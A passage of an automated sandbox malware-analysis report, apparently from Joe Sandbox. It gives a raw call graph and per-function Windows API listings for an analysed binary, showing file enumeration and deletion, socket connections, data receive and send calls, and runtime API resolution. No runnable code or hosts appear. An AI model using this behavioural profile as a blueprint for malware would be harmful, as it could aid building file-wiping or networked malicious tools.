API calls 20049 c7aa8e 20048->20049 20049->19875 20050->20048 20053 c93500 std::_Throw_Cpp_error 14 API calls 20051->20053 20052 c76c30 15 API calls 20055 c83121 Concurrency::cancel_current_task 20052->20055 20057 c83059 20053->20057 20054 c8f408 ___std_exception_destroy 9 API calls 20058 c82f93 20054->20058 20056->20051 20056->20054 20071 c83102 Concurrency::cancel_current_task 20056->20071 20059 c76c30 15 API calls 20057->20059 20060 c8f408 ___std_exception_destroy 9 API calls 20058->20060 20061 c83067 Concurrency::cancel_current_task 20059->20061 20060->20047 20298 c83f30 20061->20298 20063 c83086 Concurrency::cancel_current_task 20064 c76c30 15 API calls 20063->20064 20065 c830a5 Concurrency::cancel_current_task 20064->20065 20066 c76c30 15 API calls 20065->20066 20067 c830c4 Concurrency::cancel_current_task 20066->20067 20068 c76c30 15 API calls 20067->20068 20069 c830e3 Concurrency::cancel_current_task 20068->20069 20070 c76c30 15 API calls 20069->20070 20070->20071 20071->20052 20073 c7b70f 20072->20073 20074 c75ab0 15 API calls 20073->20074 20075 c7b72f 20074->20075 20303 c7dfb0 20075->20303 20077 c7a88a 20078 c80db0 20077->20078 20147 c80e0e 20078->20147 20079 c81ced 20080 c7b7b0 18 API calls 20079->20080 20082 c81d2b 20080->20082 20088 c66670 17 API calls 20082->20088 20083 c86490 15 API calls 20083->20147 20085 c81e91 20440 c8c53c 20085->20440 20090 c81d4f 20088->20090 20092 c7bd60 18 API calls 20090->20092 20102 c81d64 std::_Throw_Cpp_error 20092->20102 20094 c7bd60 18 API calls 20095 c81641 20094->20095 20097 c7c4c0 17 API calls 20095->20097 20096 c819ec 20101 c76c30 15 API calls 20096->20101 20099 c81654 20097->20099 20098 c71310 14 API calls 20100 c7a89f 20098->20100 20104 c76aa0 std::_Throw_Cpp_error 15 API calls 20099->20104 20100->19879 20106 c8170a Concurrency::cancel_current_task 20101->20106 20102->20096 20103 c8f408 ___std_exception_destroy 9 API calls 20102->20103 20102->20106 20107 c81dd7 20103->20107 20108 c8169e 20104->20108 20105 c859c0 
15 API calls 20105->20147 20110 c93500 std::_Throw_Cpp_error 14 API calls 20106->20110 20111 c8f408 ___std_exception_destroy 9 API calls 20107->20111 20427 c67080 20108->20427 20110->20085 20192 c815e7 std::_Throw_Cpp_error 20111->20192 20113 c88220 15 API calls 20113->20147 20114 c8145f std::_Throw_Cpp_error 20114->20106 20151 c814da std::_Throw_Cpp_error 20114->20151 20116 c8195e 20122 c7b7b0 18 API calls 20116->20122 20118 c7c660 17 API calls 20118->20147 20119 c7b7b0 18 API calls 20123 c8184f 20119->20123 20120 c83590 19 API calls 20120->20147 20125 c8199e 20122->20125 20130 c66670 17 API calls 20123->20130 20133 c66670 17 API calls 20125->20133 20126 c81a95 20131 c7b7b0 18 API calls 20126->20131 20127 c814df 20129 c7b7b0 18 API calls 20127->20129 20128 c834b0 15 API calls 20128->20147 20135 c81524 20129->20135 20136 c81873 20130->20136 20138 c81ada 20131->20138 20141 c819c2 20133->20141 20134 c83780 15 API calls 20134->20147 20142 c66670 17 API calls 20135->20142 20143 c7bd60 18 API calls 20136->20143 20144 c66670 17 API calls 20138->20144 20146 c7bd60 18 API calls 20141->20146 20148 c81548 20142->20148 20149 c81888 20143->20149 20150 c81afe 20144->20150 20157 c819d7 20146->20157 20147->20079 20147->20083 20147->20085 20147->20105 20147->20113 20147->20116 20147->20118 20147->20120 20147->20126 20147->20127 20147->20128 20147->20134 20147->20151 20155 c819f1 20147->20155 20156 c8134b 20147->20156 20163 c8178f std::_Throw_Cpp_error 20147->20163 20170 c7dfb0 15 API calls 20147->20170 20147->20192 20326 c85f50 20147->20326 20344 c86660 20147->20344 20364 c862d0 20147->20364 20382 c85d70 20147->20382 20404 c86110 20147->20404 20422 c83ab0 20147->20422 20152 c7bd60 18 API calls 20148->20152 20149->20096 20172 c8189d std::_Throw_Cpp_error 20149->20172 20153 c7bd60 18 API calls 20150->20153 20151->20098 20171 c8155d std::_Throw_Cpp_error 20152->20171 20153->20157 20154 c81b28 20158 c631c0 std::_Throw_Cpp_error 14 API calls 20154->20158 20159 c636f0 
std::_Throw_Cpp_error 15 API calls 20155->20159 20160 c636f0 std::_Throw_Cpp_error 15 API calls 20156->20160 20157->20096 20157->20154 20162 c81b34 20158->20162 20164 c81a0c 20159->20164 20165 c81366 20160->20165 20161 c8f408 ___std_exception_destroy 9 API calls 20166 c818fd 20161->20166 20167 c8f408 ___std_exception_destroy 9 API calls 20162->20167 20163->20106 20163->20119 20168 c7b7b0 18 API calls 20164->20168 20169 c7b7b0 18 API calls 20165->20169 20174 c8f408 ___std_exception_destroy 9 API calls 20166->20174 20175 c81b4a 20167->20175 20176 c81a42 20168->20176 20177 c8139c 20169->20177 20170->20147 20171->20096 20171->20106 20173 c8f408 ___std_exception_destroy 9 API calls 20171->20173 20172->20106 20172->20161 20178 c815ce 20173->20178 20179 c81916 20174->20179 20180 c8f408 ___std_exception_destroy 9 API calls 20175->20180 20181 c66670 17 API calls 20176->20181 20182 c66670 17 API calls 20177->20182 20183 c8f408 ___std_exception_destroy 9 API calls 20178->20183 20186 c81a66 20181->20186 20187 c813c0 20182->20187 20183->20192 20189 c7bd60 18 API calls 20186->20189 20190 c7bd60 18 API calls 20187->20190 20189->20157 20191 c813d5 20190->20191 20191->20096 20194 c813ea std::_Throw_Cpp_error 20191->20194 20192->20094 20192->20106 20192->20114 20193 c8f408 ___std_exception_destroy 9 API calls 20195 c81446 20193->20195 20194->20106 20194->20193 20198 c7b925 20197->20198 20199 c7b850 20197->20199 20202 c76aa0 std::_Throw_Cpp_error 15 API calls 20198->20202 20200 c7b860 20199->20200 20201 c7bd3a 20199->20201 20205 c7b4a0 15 API calls 20200->20205 20204 c63110 std::_Throw_Cpp_error 15 API calls 20201->20204 20203 c7b933 20202->20203 20206 c7b942 20203->20206 20215 c7bb19 20203->20215 20207 c7bd3f 20204->20207 20208 c7b87d 20205->20208 20209 c7bd60 18 API calls 20206->20209 20210 c93500 std::_Throw_Cpp_error 14 API calls 20207->20210 20211 c76aa0 std::_Throw_Cpp_error 15 API calls 20208->20211 20212 c7b951 20209->20212 20213 c7bd44 20210->20213 20214 c7b89a 20211->20214 
20215->20215 20219 c634e0 std::_Throw_Cpp_error 15 API calls 20215->20219 20222 c7bb54 20219->20222 20583 c75690 20285->20583 20289 c71339 std::_Throw_Cpp_error 20288->20289 20290 c71319 20288->20290 20289->19917 20290->20289 20291 c93500 std::_Throw_Cpp_error 14 API calls 20290->20291 20292 c71360 20291->20292 20292->19917 20294 c8f3a5 ___std_exception_copy 15 API calls 20293->20294 20295 c76c54 20294->20295 20296 c8f3a5 ___std_exception_copy 15 API calls 20295->20296 20297 c76c7b 20296->20297 20297->19907 20299 c8f3a5 ___std_exception_copy 15 API calls 20298->20299 20300 c83f54 20299->20300 20301 c8f3a5 ___std_exception_copy 15 API calls 20300->20301 20302 c83f7b 20301->20302 20302->20063 20306 c7e0c0 20303->20306 20305 c7dfca std::locale::_Setgloballocale 20305->20077 20307 c7e0f9 20306->20307 20313 c7e128 20306->20313 20308 c7e21a 20307->20308 20311 c7e10b 20307->20311 20323 c7e280 20308->20323 20311->20313 20314 c855d0 20311->20314 20313->20305 20315 c8569f 20314->20315 20317 c855e7 20314->20317 20316 c63750 15 API calls 20315->20316 20318 c856a4 20316->20318 20319 c880b0 15 API calls 20317->20319 20320 c85624 std::_Locinfo::_Locinfo_ctor 20319->20320 20321 c85674 std::_Throw_Cpp_error 20320->20321 20322 c93500 std::_Throw_Cpp_error 14 API calls 20320->20322 20321->20313 20322->20315 20324 c8c579 std::_Throw_Cpp_error 15 API calls 20323->20324 20325 c7e28a 20324->20325 20327 c85f8e 20326->20327 20328 c85fb5 20327->20328 20329 c85ffe 20327->20329 20330 c86106 20327->20330 20328->20147 20333 c8602c 20329->20333 20334 c8606e 20329->20334 20337 c86015 20329->20337 20331 c8c53c 15 API calls 20330->20331 20332 c8610b 20331->20332 20335 c71940 15 API calls 20333->20335 20334->20337 20338 c8609a 20334->20338 20339 c8607d 20334->20339 20335->20337 20336 c71940 15 API calls 20336->20328 20337->20336 20341 c83ab0 15 API calls 20338->20341 20444 c75460 20339->20444 20342 c860b6 20341->20342 20342->20337 20343 c71960 15 API calls 20342->20343 20343->20337 20345 c8669e 
20344->20345 20346 c866c5 20345->20346 20347 c75ab0 15 API calls 20345->20347 20346->20147 20348 c866e9 20347->20348 20349 c8670b 20348->20349 20350 c86813 20348->20350 20353 c86739 20349->20353 20354 c8677b 20349->20354 20359 c86722 20349->20359 20351 c8c53c 15 API calls 20350->20351 20352 c86818 20351->20352 20355 c71940 15 API calls 20353->20355 20357 c8678a 20354->20357 20358 c867a7 20354->20358 20354->20359 20355->20359 20356 c71940 15 API calls 20356->20346 20360 c75460 15 API calls 20357->20360 20361 c83ab0 15 API calls 20358->20361 20359->20356 20360->20359 20362 c867c3 20361->20362 20362->20359 20363 c71960 15 API calls 20362->20363 20363->20359 20365 c8630e 20364->20365 20366 c86335 20365->20366 20367 c86488 20365->20367 20368 c86380 20365->20368 20366->20147 20369 c8c53c 15 API calls 20367->20369 20371 c86397 20368->20371 20372 c863ae 20368->20372 20373 c863f0 20368->20373 20370 c8648d 20369->20370 20375 c71940 15 API calls 20371->20375 20374 c71940 15 API calls 20372->20374 20373->20371 20376 c8641c 20373->20376 20377 c863ff 20373->20377 20374->20371 20375->20366 20379 c83ab0 15 API calls 20376->20379 20378 c75460 15 API calls 20377->20378 20378->20371 20380 c86438 20379->20380 20380->20371 20381 c71960 15 API calls 20380->20381 20381->20371 20383 c85dae 20382->20383 20384 c85dd5 20383->20384 20385 c8df02 std::_Facet_Register 15 API calls 20383->20385 20384->20147 20386 c85df7 20385->20386 20387 c74090 std::_Throw_Cpp_error 15 API calls 20386->20387 20388 c85e16 20387->20388 20389 c85f49 20388->20389 20392 c85e41 20388->20392 20390 c8c53c 15 API calls 20389->20390 20391 c85f4e 20390->20391 20393 c85e6f 20392->20393 20394 c85eb1 20392->20394 20397 c85e58 20392->20397 20395 c71940 15 API calls 20393->20395 20394->20397 20398 c85edd 20394->20398 20399 c85ec0 20394->20399 20395->20397 20396 c71940 15 API calls 20396->20384 20397->20396 20401 c83ab0 15 API calls 20398->20401 20400 c75460 15 API calls 20399->20400 20400->20397 20402 c85ef9 20401->20402 
20402->20397 20403 c71960 15 API calls 20402->20403 20403->20397 20405 c8614e 20404->20405 20406 c86175 20405->20406 20407 c862c8 20405->20407 20408 c861c0 20405->20408 20406->20147 20409 c8c53c 15 API calls 20407->20409 20411 c861d7 20408->20411 20412 c861ee 20408->20412 20414 c86230 20408->20414 20410 c862cd 20409->20410 20415 c71940 15 API calls 20411->20415 20413 c71940 15 API calls 20412->20413 20413->20411 20414->20411 20416 c8625c 20414->20416 20417 c8623f 20414->20417 20415->20406 20419 c83ab0 15 API calls 20416->20419 20418 c75460 15 API calls 20417->20418 20418->20411 20420 c86278 20419->20420 20420->20411 20421 c71960 15 API calls 20420->20421 20421->20411 20423 c83afa 20422->20423 20424 c83b8e 20423->20424 20425 c7e280 15 API calls 20423->20425 20424->20147 20426 c83bd9 20425->20426 20428 c66410 15 API calls 20427->20428 20429 c670f9 20428->20429 20430 c76aa0 std::_Throw_Cpp_error 15 API calls 20429->20430 20433 c67117 std::_Throw_Cpp_error 20430->20433 20431 c671be std::_Throw_Cpp_error 20432 c67258 20433->20431 20433->20432 20441 c8c54a Concurrency::cancel_current_task 20440->20441 20550 c8c305 20441->20550 20443 c8c56a Concurrency::cancel_current_task 20445 c7546f 20444->20445 20446 c7549d 20444->20446 20445->20337 20449 c80ac0 20446->20449 20450 c80b93 20449->20450 20451 c80ae4 20449->20451 20452 c63750 15 API calls 20450->20452 20468 c80d10 20451->20468 20453 c80b98 20452->20453 20455 c80ca9 20453->20455 20456 c80bdd 20453->20456 20469 c80d59 20468->20469 20470 c80d19 20468->20470 20469->20469 20470->20469 20471 c8df02 std::_Facet_Register 15 API calls 20470->20471 20473 c80d30 20470->20473 20471->20473 20551 c638e0 std::regex_error::regex_error 15 API calls 20550->20551 20552 c8c317 20551->20552 20552->20443 20584 c756c9 20583->20584 20589 c75710 20583->20589 20585 c756f2 20584->20585 20588 c75a14 20584->20588 20617 c7a1c0 20584->20617 20587 c7590a 20589->20588 20593 c7a1c0 15 API calls 20589->20593 20602 c7573b 20589->20602 20609 c75705 
20589->20609 20592 c71940 15 API calls 20592->20609 20593->20602 20602->20609 20608 c80ac0 15 API calls 20608->20609 20609->20587 20609->20592 20609->20608 20637 c7a250 20609->20637 20618 c7a23c 20617->20618 20619 c7a1dc 20617->20619 20651 c7b289 20650->20651 20652 c7b2a9 std::_Throw_Cpp_error 20650->20652 20651->20652 20653 c93500 std::_Throw_Cpp_error 14 API calls 20651->20653 20652->19946 20654 c7b2d0 20653->20654 20654->19946 20656 cb36b7 20655->20656 20658 cb34a1 std::_Throw_Cpp_error 20655->20658 20656->18406 20659 cb35d8 std::_Throw_Cpp_error std::locale::_Setgloballocale 20658->20659 20662 c93040 20658->20662 20671 c635b0 20658->20671 20659->20656 20660 c635b0 15 API calls 20659->20660 20660->20659 20663 c93073 20662->20663 20664 c93057 20662->20664 20665 ca46d2 __Getctype 14 API calls 20663->20665 20664->20658 20666 c93078 20665->20666 20667 ca49bd __Getctype 14 API calls 20666->20667 20668 c93088 20667->20668 20668->20664 20669 ca42c9 16 API calls 20668->20669 20670 c930ba 20669->20670 20670->20658 20672 c635d5 20671->20672 20673 c636e2 20671->20673 20674 c635ef 20672->20674 20676 c63634 20672->20676 20675 c63750 15 API calls 20673->20675 20677 c636e7 20674->20677 20678 c8df02 std::_Facet_Register 15 API calls 20674->20678 20675->20677 20680 c8df02 std::_Facet_Register 15 API calls 20676->20680 20683 c635ff std::_Locinfo::_Locinfo_ctor 20676->20683 20679 c63070 Concurrency::cancel_current_task 15 API calls 20677->20679 20678->20683 20681 c636ec 20679->20681 20680->20683 20682 c93500 std::_Throw_Cpp_error 14 API calls 20682->20673 20683->20682 20684 c636b3 std::_Throw_Cpp_error 20683->20684 20684->20658 20686 c8d907 20685->20686 20687 c8dedd GetSystemTimePreciseAsFileTime 20685->20687 20686->17852 20687->20686 20812 c76210 20813 c76219 20812->20813 20816 c76254 std::_Throw_Cpp_error 20812->20816 20829 c79620 20813->20829 20817 c93500 std::_Throw_Cpp_error 14 API calls 20818 c7627c 20817->20818 20819 c64670 std::_Throw_Cpp_error 15 API calls 20818->20819 

Control-flow Graph

[Control-flow graph of the function starting at d52870; legend: Executed / Not Executed]
APIs
• FindFirstFileA.KERNEL32(?,?,00DE8E90,?,?,?,\*.*,00000004), ref: 00D5298C
• FindNextFileA.KERNELBASE(00000000,00000010), ref: 00D52B28
• GetLastError.KERNEL32 ref: 00D52B3E
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00D52B5B
• RemoveDirectoryA.KERNEL32(?), ref: 00D52B79
• GetLastError.KERNEL32 ref: 00D52B8E
• std::_Throw_Cpp_error.LIBCPMT ref: 00D52C46
• std::_Throw_Cpp_error.LIBCPMT ref: 00D52C57
• CreateDirectoryA.KERNEL32(?,00000000,00000005), ref: 00D52C92
• std::_Throw_Cpp_error.LIBCPMT ref: 00D52CAD
• std::_Throw_Cpp_error.LIBCPMT ref: 00D52CBE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Cpp_errorThrow_std::_$File$DirectoryErrorFindLast$AttributesCreateFirstNextRemove
                                                                                                                                              • String ID: \*.*
                                                                                                                                              • API String ID: 2704257422-1173974218
                                                                                                                                              • Opcode ID: 09ecbe75225cc72ff77af787665c177e197404d79a7861038230dee6cff86527
                                                                                                                                              • Instruction ID: d6e12d31e3784d7050b172e9d539c4534b1b000fc9679c3d625b3dc4cf4d8931
                                                                                                                                              • Opcode Fuzzy Hash: 09ecbe75225cc72ff77af787665c177e197404d79a7861038230dee6cff86527
                                                                                                                                              • Instruction Fuzzy Hash: 8BC136319002059BCF24DF64CC89BBDBBB5EF46315F184219EC59A7292DB709A8CDB71
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00CBB14B
                                                                                                                                              • CreateDirectoryA.KERNEL32(0000000F,00000000), ref: 00CBB6CD
                                                                                                                                              • CreateDirectoryA.KERNEL32(0000000F,00000000), ref: 00CBB8E9
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00CBBA77
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00CBC326
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00CBC8B2
                                                                                                                                              • GetLastError.KERNEL32 ref: 00CBC8BD
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 00CBC90D
                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?), ref: 00CBCB49
                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 00CBD1EF
                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00CBDB22
                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00CBDB33
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectory$Cpp_errorThrow_std::_$AttributesErrorFileLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 453214671-0
                                                                                                                                              • Opcode ID: 3c0db18d64bbaa0f2f80de1a9249112236600c2570f3449d69e9076afb8635af
                                                                                                                                              • Instruction ID: 2f8c26b6be7b75a8079bb1eac37e16f3b837475eb6616e4a39190706e00aec11
                                                                                                                                              • Opcode Fuzzy Hash: 3c0db18d64bbaa0f2f80de1a9249112236600c2570f3449d69e9076afb8635af
                                                                                                                                              • Instruction Fuzzy Hash: 513323B0D042688BDB25CF68CD84BEDBBB5AF49304F1082D9E459A7252EB306F85DF51
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9ae6584482ab6f5c482147a45a32b1b0033f233b328fcd5fa84bccb0f5a254a3
                                                                                                                                              • Instruction ID: 8fe4ea66bf990aa4ad6c1a050effc4d8a27d2c16cbcd0cf56a8f90c97a8163df
                                                                                                                                              • Opcode Fuzzy Hash: 9ae6584482ab6f5c482147a45a32b1b0033f233b328fcd5fa84bccb0f5a254a3
                                                                                                                                              • Instruction Fuzzy Hash: ADA231B0C042688BDB25CF68CD84BEDBBB5AF59304F1482D9E449BB251DB706E89DF50
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,00C809DA,?), ref: 00C8C866
                                                                                                                                              • GetLastError.KERNEL32(?,00C809DA,?), ref: 00C8C878
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileFindFirstLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 873889042-0
                                                                                                                                              • Opcode ID: 7a133db744cb40d82c00746803c78282b2cd6c6706b4623599a3c190a3527eeb
                                                                                                                                              • Instruction ID: 28bbb422e26b26a181ac4fb2d4c1bc9cd7e0ed87ed3ba3382796f89a319fc22e
                                                                                                                                              • Opcode Fuzzy Hash: 7a133db744cb40d82c00746803c78282b2cd6c6706b4623599a3c190a3527eeb
                                                                                                                                              • Instruction Fuzzy Hash: 51F03A3104020AAFDB106FA49C489BA7BA8EB05374B104625F969D15F1DA318AA2A7B4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6e0581c6d35935c47c567eaa35f268c9253f9207795503609650a65e3987eb85
                                                                                                                                              • Instruction ID: f26a57f1714460cd942f49e166867c590869e5a3dfc569d611b312ca77f88847
                                                                                                                                              • Opcode Fuzzy Hash: 6e0581c6d35935c47c567eaa35f268c9253f9207795503609650a65e3987eb85
                                                                                                                                              • Instruction Fuzzy Hash: 8D32BF70D00248DFDB24DF68C9857ECBBB1EF54304F148199E849AB392DB709A84DFA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e049d02d182e6ed60b20a539b0ef182e1b457fd3cfd3172ae4c3ee43cd0cfadf
                                                                                                                                              • Instruction ID: 90eb181d6f11f23234b267dddcf563cab7a936b6d9018a042ff9cae319b59564
                                                                                                                                              • Opcode Fuzzy Hash: e049d02d182e6ed60b20a539b0ef182e1b457fd3cfd3172ae4c3ee43cd0cfadf
                                                                                                                                              • Instruction Fuzzy Hash: 83B1D13090060A9BCF28CE69D69D6BEB7B1FF04304F15061DD9A297691DB31AF41DBD2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • setsockopt.WS2_32(000002F8,0000FFFF,00001006,?,00000008), ref: 00D32466
                                                                                                                                              • recv.WS2_32(?,00000004,00000002), ref: 00D32481
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00D32485
                                                                                                                                              • recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 00D324EE
                                                                                                                                              • recv.WS2_32(00000000,0000000C,00000008), ref: 00D3250F
                                                                                                                                              • setsockopt.WS2_32(0000FFFF,00001006,?,00000008,?), ref: 00D3258B
                                                                                                                                              • recv.WS2_32(00000000,?,00000008), ref: 00D325AC
                                                                                                                                                • Part of subcall function 00D33150: WSAStartup.WS2_32 ref: 00D3317A
                                                                                                                                                • Part of subcall function 00D33150: socket.WS2_32(?,?,?), ref: 00D3321D
                                                                                                                                                • Part of subcall function 00D33150: connect.WS2_32(00000000,00DBF6D1,?), ref: 00D33231
                                                                                                                                                • Part of subcall function 00D33150: closesocket.WS2_32(00000000), ref: 00D3323D
                                                                                                                                                • Part of subcall function 00D33150: WSACleanup.WS2_32 ref: 00D33250
                                                                                                                                              • recv.WS2_32(?,00000004,00000008), ref: 00D327D6
                                                                                                                                              • __Xtime_get_ticks.LIBCPMT ref: 00D327DA
                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D327E8
                                                                                                                                              • Sleep.KERNEL32(00000001,00000000,?,00002710,00000000), ref: 00D3284F
                                                                                                                                              • Sleep.KERNEL32(00000064,?,00002710,00000000), ref: 00D3285D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: recv$Sleepsetsockopt$CleanupErrorLastStartupUnothrow_t@std@@@Xtime_get_ticks__ehfuncinfo$??2@closesocketconnectsocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2144401278-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(?,00CBF30E,?,00DBA5B3,000000FF), ref: 00D52D0C
                                                                                                                                              • GetLastError.KERNEL32(?,00DBA5B3,000000FF), ref: 00D52D17
                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00D52D4E
                                                                                                                                              • std::_Throw_Cpp_error.LIBCPMT ref: 00D52D5F
                                                                                                                                              • GetModuleHandleA.KERNEL32(?), ref: 00D53048
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00D53053
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Cpp_errorThrow_std::_$AddressAttributesErrorFileHandleLastModuleProc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1350367881-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C7A959
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C7A972
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C7AB4E
                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 00C7AB67
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_destroy
                                                                                                                                              • String ID: value
                                                                                                                                              • API String ID: 4194217158-494360628
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
Similarity
• API ID: CleanupStartupclosesocketconnectsocket
• String ID:
• API String ID: 2410783842-0
• Opcode ID: 954f71ee98091d0349dfe94de8b7976f78c5900a37ea2be21ce34d846b65a6a6
• Instruction ID: 71a9475c7ef3b9e4ab175b32e9f8edff98c9bfd8bc7b82b0c9aa0ccf2eeb30cc
• Opcode Fuzzy Hash: 954f71ee98091d0349dfe94de8b7976f78c5900a37ea2be21ce34d846b65a6a6
• Instruction Fuzzy Hash: E331E4365043429BD7209F64DD48A2BBBE5FFC4734F144B1DF9A8D22E0D37499448AB6
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(Ws2_32.dll,?,?,?,?,00DB88D8,00000000,00000000,-00DE9220), ref: 00C68566
• GetProcAddress.KERNEL32(00000000,?), ref: 00C68574
• WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00DB88D8,00000000,00000000,-00DE9220), ref: 00C68589
Strings
Memory Dump Source
• Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
Similarity
• API ID: AddressHandleModuleProcSend
• String ID: Ws2_32.dll
• API String ID: 2819740048-3093949381
• Opcode ID: 4a6340f6e3071dce73a8e301926dd8415b3d5f221c8bff93899dc38a0eb7d314
• Instruction ID: 087791e6df43221580160ebb8e3387dbbf07c532d86c0c24ee7b44a77f318363
• Opcode Fuzzy Hash: 4a6340f6e3071dce73a8e301926dd8415b3d5f221c8bff93899dc38a0eb7d314
• Instruction Fuzzy Hash: C1121470D00258DFDB28CF68DC947ADBBB1EF45304F18425DE496AB682DB70AD89CB91
Uniqueness

